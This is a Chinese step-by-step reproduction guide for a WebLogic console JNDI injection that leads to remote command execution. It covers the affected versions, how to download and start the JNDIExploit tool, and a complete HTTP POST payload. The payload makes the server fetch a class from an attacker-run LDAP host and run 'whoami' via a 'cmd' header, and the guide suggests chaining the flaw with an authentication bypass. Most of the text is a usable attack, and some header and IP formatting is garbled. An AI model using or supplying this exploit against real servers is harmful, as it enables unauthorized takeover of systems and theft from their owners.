Oracle WebLogic:一款流行的JAVA应用服务器
0x01 复现环境
复现环境:本地搭建的环境(win10 1909)
复现版本:WebLogic v12.2.1.4.0
环境搭建:参考https://mp.weixin.qq.com/s/NL9o7MVG8j8zikeGUfTsVA中的环境搭建部分
0x02 利用条件
需要登陆WebLogic控制台
0x03 影响版本
10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
0x04 漏洞复现
攻击环境:kali x64
下载JNDIExploit:https://github.com/feihong-cs/JNDIExploit/releases/download/v.1.11/JNDIExploit.v1.11.zip
启动JNDIExploit:
java -jar ./JNDIExploit-v1.11.jar -i 192.168.1.5#其中192.168.1.5为本机IP登录WebLogic控制台
刷新WebLogic控制台,burp抓包,替换为如下payload
POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.1;5:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1Host: 192.168.1.7:7001User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflatecmd:whoamiReferer: http://192.168.1.7:7001/console/login/LoginForm.jspConnection: closeCookie: ADMINCONSOLESESSION=-XjUGJChfEBvqXqZBo748vnBGr895IIDGF5cmnoR9HkR_uY8Hrfd!-1181708775Upgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cache
如下图,可以看到成功执行命令whoami(此漏洞可配合Weblogic未授权访问漏洞(CVE-2020-14882)使用)